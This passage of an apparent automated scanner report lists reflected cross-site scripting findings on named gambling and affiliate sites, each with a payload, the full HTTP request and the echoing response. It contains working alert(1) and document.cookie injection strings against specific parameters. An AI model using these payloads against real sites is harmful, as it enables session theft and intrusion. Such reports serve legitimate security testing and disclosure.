The value of the PRD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d09da'%3balert(1)//698914ca5c0 was submitted in the PRD parameter. This input was echoed as d09da';alert(1)//698914ca5c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/Lobby.aspx?CSI=17&SKI=0&CUR=EUR&LNG=SPA&AFI=17&MMI=0&PRD=d09da'%3balert(1)//698914ca5c0&UNIQUEVISITORID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AR=&PAR=&BD=www.mundirasca.com&SDN=MundiRasca.com&CORID=&SENTDATE=&COREXPDATE=&GID=&RegistrationMode= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xlhekov0yyaqd345yzm2mh55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
,'EUR','SPA','17','0','','','','',1,4,5,100,'','','MundiRasca.com','..y+%c2%a1cambia+tu+suerte!','MundiRasca.com','www.mundirasca.com','', '&UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7','','','','d09da';alert(1)//698914ca5c0',"")
                        </script>
...[SNIP]...

3.32. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [UNIQUEVISITORID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The value of the UNIQUEVISITORID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac3b5'%3balert(1)//0fdbb5aef4f was submitted in the UNIQUEVISITORID parameter. This input was echoed as ac3b5';alert(1)//0fdbb5aef4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/Lobby.aspx?CSI=17&SKI=0&CUR=EUR&LNG=SPA&AFI=17&MMI=0&PRD=&UNIQUEVISITORID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7ac3b5'%3balert(1)//0fdbb5aef4f&AR=&PAR=&BD=www.mundirasca.com&SDN=MundiRasca.com&CORID=&SENTDATE=&COREXPDATE=&GID=&RegistrationMode= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ar2sx145gmevit45fudsrcn4; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
#2c62a0','0','EUR','SPA','17','0','','','','',1,4,5,100,'','','MundiRasca.com','..y+%c2%a1cambia+tu+suerte!','MundiRasca.com','www.mundirasca.com','', '&UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7ac3b5';alert(1)//0fdbb5aef4f','','','','',"")
                        </script>
...[SNIP]...

3.33. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [AR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the AR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8abcd'%3balert(1)//fdbdc8c0c01 was submitted in the AR parameter. This input was echoed as 8abcd';alert(1)//fdbdc8c0c01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301378abcd'%3balert(1)//fdbdc8c0c01&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3s4ea145uzdvo2upuhtuo3rc; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19556


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
tedClose = true; //prevent the "close request" when we change the language
       window.location.replace('Lobby.aspx?CSI=3&SKI=0&AFI=3&MMI=0&CUR=' + pCurrencyCode + '&LNG=~' + pLanguageCode + '&AR=1301378abcd';alert(1)//fdbdc8c0c01&PAR=0'+'&Refresh=1' + '&WID=');
   }
       
   //send player events notification
   function TimerGetPlayerEvents()
   {
try
{
    if(UserName!='-')
{
            var h
...[SNIP]...

3.34. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the BD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190db"style%3d"x%3aexpression(alert(1))"f1e0058e238 was submitted in the BD parameter. This input was echoed as 190db"style="x:expression(alert(1))"f1e0058e238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com190db"style%3d"x%3aexpression(alert(1))"f1e0058e238&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=j3jz3quzo4m0ga55rqwealiz; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19506


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<meta content="info.Winnings.com190db"style="x:expression(alert(1))"f1e0058e238, The Best online scratch games in the world, More then 20 amazing online scratch games. Winnings &amp; change your day!!!" name="description" />
...[SNIP]...

3.35. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the BD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a3b8'%3balert(1)//8816847b473 was submitted in the BD parameter. This input was echoed as 4a3b8';alert(1)//8816847b473 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com4a3b8'%3balert(1)//8816847b473&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=liapwh45d4ztmuyumndgtc45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19445


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('21','#2f82b6','0','GBP','ENG','0','0','','','','',1,4,5,100,'','','Winnings.com','','Winnings.com','info.Winnings.com4a3b8';alert(1)//8816847b473','', '','','','','',"")
                        </script>
...[SNIP]...

3.36. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BO parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the BO request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f0b9'%3balert(1)//c208a0401a was submitted in the BO parameter. This input was echoed as 3f0b9';alert(1)//c208a0401a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?CSI=28&LNG=ENG&CUR=GBP&RegistrationMode=PM&BO=FM3f0b9'%3balert(1)//c208a0401a&BD=info.crazyscratch.com&SDN=CrazyScratch.com& HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cqorslb3q0irn1uxhyakm555; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('28','#7dda4d','0','GBP','ENG','0','0','','','','',1,4,5,100,'PM','FM3f0b9';alert(1)//c208a0401a','CrazyScratch.com','It\'s+money+madness!','CrazyScratch','info.crazyscratch.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.37. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [PAR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the PAR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68d70'%3balert(1)//3f67c728a9b was submitted in the PAR parameter. This input was echoed as 68d70';alert(1)//3f67c728a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137&AFI=3&PAR=068d70'%3balert(1)//3f67c728a9b&BD=primescratchcards.com&SDN=primescratchcards.com HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oqzkg255itycuma3lquknh55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19556


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
se = true; //prevent the "close request" when we change the language
       window.location.replace('Lobby.aspx?CSI=3&SKI=0&AFI=3&MMI=0&CUR=' + pCurrencyCode + '&LNG=~' + pLanguageCode + '&AR=130137&PAR=068d70';alert(1)//3f67c728a9b'+'&Refresh=1' + '&WID=');
   }
       
   //send player events notification
   function TimerGetPlayerEvents()
   {
try
{
    if(UserName!='-')
{
            var httpRes
...[SNIP]...

3.38. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [RegistrationMode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the RegistrationMode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9544'%3balert(1)//639feef7bad was submitted in the RegistrationMode parameter. This input was echoed as c9544';alert(1)//639feef7bad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?CSI=28&LNG=ENG&CUR=GBP&RegistrationMode=PMc9544'%3balert(1)//639feef7bad&BO=FM&BD=info.crazyscratch.com&SDN=CrazyScratch.com& HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jftp2x45snd0xury1lb4a3ir; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19505


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('28','#7dda4d','0','GBP','ENG','0','0','','','','',1,4,5,100,'PMc9544';alert(1)//639feef7bad','FM','CrazyScratch.com','It\'s+money+madness!','CrazyScratch','info.crazyscratch.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.39. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [SDN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the SDN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69960'%3balert(1)//1a3d4ca2f9a was submitted in the SDN parameter. This input was echoed as 69960';alert(1)//1a3d4ca2f9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com&SDN=Winnings.com69960'%3balert(1)//1a3d4ca2f9a&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qknbln55rvubqmvtgokgqr45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19417


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('21','#2f82b6','0','GBP','ENG','0','0','','','','',1,4,5,100,'','','Winnings.com69960';alert(1)//1a3d4ca2f9a','','Winnings.com','info.Winnings.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.40. http://trk.primescratchcards.com/ [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.primescratchcards.com
Path:   /

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload 57616<script>alert(1)</script>3888a68dce1 was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ac=5157616<script>alert(1)</script>3888a68dce1&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 11:45:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 507
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=MEFGLCIAPBIIFMKKONEKHNHL; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 5157616<script>alert(1)</script>3888a68dce1 ,130137 ,5143, 201105160000 <font face="Arial" size=2>
<p>Micro
...[SNIP]...

3.41. https://www.aspireaffiliates.com/ [CMI parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecc07"><script>alert(1)</script>964271dc4b6 was submitted in the CMI parameter. This input was echoed as ecc07\"><script>alert(1)</script>964271dc4b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?CMI=1ecc07"><script>alert(1)</script>964271dc4b6 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=1ecc07\"><script>alert(1)</script>964271dc4b6" title="Home">
...[SNIP]...

3.42. https://www.aspireaffiliates.com/ [CMI parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a96c</script><script>alert(1)</script>e23233807d6 was submitted in the CMI parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?CMI=15a96c</script><script>alert(1)</script>e23233807d6 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
k(function(){
       $("#brands_ok_more").show("slow");
   $("#brands_popular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?CMI=15a96c</script><script>alert(1)</script>e23233807d6';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?CMI=15a96c</script>
...[SNIP]...

3.43. https://www.aspireaffiliates.com/ [CMI parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ef6"><script>alert(1)</script>b2d5fefb499 was submitted in the CMI parameter. This input was echoed as 15ef6\"><script>alert(1)</script>b2d5fefb499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?CMI=15ef6"><script>alert(1)</script>b2d5fefb499 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?CMI=15ef6\"><script>alert(1)</script>b2d5fefb499" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.44. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17763"><script>alert(1)</script>f04f9a95002 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 17763\"><script>alert(1)</script>f04f9a95002 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=117763"><script>alert(1)</script>f04f9a95002 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=117763\"><script>alert(1)</script>f04f9a95002" title="Home">
...[SNIP]...

3.45. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eda92</script><script>alert(1)</script>f5f515c1148 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script><script>alert(1)</script>f5f515c1148 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script><script>alert(1)</script>f5f515c1148';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script>
...[SNIP]...

3.46. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4800"><script>alert(1)</script>7b893187770 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as d4800\"><script>alert(1)</script>7b893187770 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=d4800"><script>alert(1)</script>7b893187770 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
